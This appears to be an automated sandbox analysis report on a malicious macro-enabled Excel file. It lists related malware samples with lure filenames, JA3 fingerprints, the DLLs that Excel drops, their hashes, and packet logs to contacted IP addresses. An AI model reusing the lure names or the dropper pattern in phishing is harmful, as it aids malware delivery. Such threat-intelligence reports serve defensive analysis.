	Follow up Purchase order num- 4500262450.exe	Get hash	malicious	Browse	104.21.75.42
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
	2790000.dll	Get hash	malicious	Browse	104.20.185.68
	2770174.dll	Get hash	malicious	Browse	104.20.185.68
	Payment Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	rial exe.exe	Get hash	malicious	Browse	104.21.19.200
	Quotation.exe	Get hash	malicious	Browse	104.21.19.200
	SCTc9qaix4.exe	Get hash	malicious	Browse	1.0.0.1
	AFS Co., Ltd..exe	Get hash	malicious	Browse	104.26.6.41
AMAZON-02US	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	13.225.75.73
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Reciept 19129475.xlsb	Get hash	malicious	Browse	54.191.98.150
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi	Get hash	malicious	Browse	18.231.168.212
	39d0c1e7.msi	Get hash	malicious	Browse	3.143.159.48
	Movcy_v1.0.0.apk	Get hash	malicious	Browse	52.39.180.2
	order No. 00192099##001 pdf.exe	Get hash	malicious	Browse	3.143.65.214
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74
	lZYIQJNUsZ.exe	Get hash	malicious	Browse	13.249.12.162
	q62NZgHtRq.exe	Get hash	malicious	Browse	3.22.53.161
	i	Get hash	malicious	Browse	52.9.197.152
	8zsiEeSTzI.exe	Get hash	malicious	Browse	52.217.140.209

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	143.204.91.74
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	143.204.91.74
	Formtofill4184860.xlsm	Get hash	malicious	Browse	143.204.91.74
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	143.204.91.74
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	143.204.91.74
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	143.204.91.74
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	143.204.91.74
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.91.74
	108020075.exe	Get hash	malicious	Browse	143.204.91.74
	G-DECL G50 EURL.xlsx	Get hash	malicious	Browse	143.204.91.74
	1.doc	Get hash	malicious	Browse	143.204.91.74
	DECL G50 EURL!.xlsx	Get hash	malicious	Browse	143.204.91.74
	Order No. 211128.doc	Get hash	malicious	Browse	143.204.91.74
	SOA.xlsx	Get hash	malicious	Browse	143.204.91.74
	DECL G50 EURL.xlsx	Get hash	malicious	Browse	143.204.91.74
	WO 378871.xlsb	Get hash	malicious	Browse	143.204.91.74
	Order 824126.xlsb	Get hash	malicious	Browse	143.204.91.74
	WO 378871.xlsb	Get hash	malicious	Browse	143.204.91.74

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse
C:\Users\user\XTOWN.dll	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56B30D73.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	174009
Entropy (8bit):	7.967231122944825
Encrypted:	false
SSDEEP:	3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5:	C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1:	AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256:	D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512:	131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................

C:\Users\user\Desktop\~$uhr908723097306.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\XTOWN.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.939404138272304
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	uhr908723097306.xlsm
File size:	189905
MD5:	e61d872e6bd0ba19d435dae638168034
SHA1:	939842aa615def586067f03e12fefbc0f6952d57
SHA256:	00c91b1844e31811f8a2ebd9047cc093a955437c700844f7a72bd6d54b73c602
SHA512:	4fd8d3a17daa3352123b2fc874fad40dce3ad80996bfc3e3d7e78d0becd7bf57d1cb17d145050a777e0ac91892936a32f7d3817ba2b2fe91ff80a4c5d5ac2b23
SSDEEP:	3072:UDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:+RcGUlFzy4mpTHdrUc3/SsYASx
File Content Preview:	PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 16:11:22.267441988 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:11:22.307059050 CEST	80	49167	172.67.198.51	192.168.2.22
Jul 6, 2021 16:11:22.307168961 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:11:22.308283091 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:11:22.347326040 CEST	80	49167	172.67.198.51	192.168.2.22
Jul 6, 2021 16:11:22.382234097 CEST	80	49167	172.67.198.51	192.168.2.22
Jul 6, 2021 16:11:22.382285118 CEST	80	49167	172.67.198.51	192.168.2.22
Jul 6, 2021 16:11:22.382344961 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:11:22.382375956 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:11:22.476898909 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.516496897 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.516645908 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.517206907 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.555327892 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.584856033 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.584901094 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.584939957 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.584950924 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.584975958 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.584991932 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585009098 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585014105 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585015059 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585055113 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585071087 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585102081 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585113049 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585144997 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585160971 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585184097 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585199118 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585237026 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585237980 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585290909 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.585828066 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585850000 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.585918903 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.586127996 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.586189032 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.586215973 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.586261988 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.587233067 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.587260962 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.587313890 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.588197947 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.588227034 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.588284016 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.588298082 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.588632107 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.588645935 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591526031 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591551065 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591577053 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591619015 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591622114 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591634989 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591639996 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591644049 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591655970 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591682911 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.591686964 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.591730118 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.592555046 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.592622042 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.592662096 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.592720985 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.593631983 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.593657970 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.593696117 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.593712091 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.593907118 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.593931913 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.593960047 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.593976974 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.623282909 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.623373985 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.624773979 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.624794960 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.624814987 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.624835014 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.624855995 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.624866962 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.624896049 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.624902010 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.624907017 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.625875950 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.625899076 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.625942945 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.625961065 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.629020929 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629040003 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629215956 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.629307985 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629353046 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629374027 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.629398108 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.629441977 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629489899 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:11:22.629501104 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.629548073 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:11:22.699152946 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:11:22.738984108 CEST	80	49169	104.21.55.83	192.168.2.22
Jul 6, 2021 16:11:22.739171982 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:11:22.740634918 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:11:22.781200886 CEST	80	49169	104.21.55.83	192.168.2.22
Jul 6, 2021 16:11:22.794564009 CEST	80	49169	104.21.55.83	192.168.2.22
Jul 6, 2021 16:11:22.794603109 CEST	80	49169	104.21.55.83	192.168.2.22
Jul 6, 2021 16:11:22.794653893 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:11:22.794681072 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:11:23.949585915 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:23.989308119 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:23.989504099 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.000452042 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.039856911 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.039889097 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.039910078 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.039933920 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.040020943 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.044653893 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.044676065 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.044771910 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.053930998 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.095177889 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.095210075 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.306242943 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.343333960 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.343511105 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.541083097 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.580641031 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.784169912 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.784271955 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.784329891 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.784380913 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.784528017 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.784913063 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.785379887 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.785433054 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.787584066 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.787636995 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.787676096 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.787728071 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.788681030 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.788748026 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.789072990 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.789103985 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.789109945 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.792614937 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.792722940 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.792773962 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.792836905 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.792896032 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.792953014 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.793015003 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.793037891 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.795591116 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.796601057 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796673059 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796730995 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796785116 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796812057 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.796840906 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796895981 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.796919107 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.796951056 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.797007084 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.797034025 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.800182104 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.800311089 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.800952911 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.875592947 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.877255917 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.878786087 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.880258083 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881685972 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881726980 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.881746054 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.881799936 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881829023 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881848097 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881870985 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881894112 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881917000 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881937981 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881959915 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.881982088 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.882008076 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.882030964 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.882052898 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.882075071 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.883865118 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.883888006 CEST	443	49170	143.204.91.74	192.168.2.22
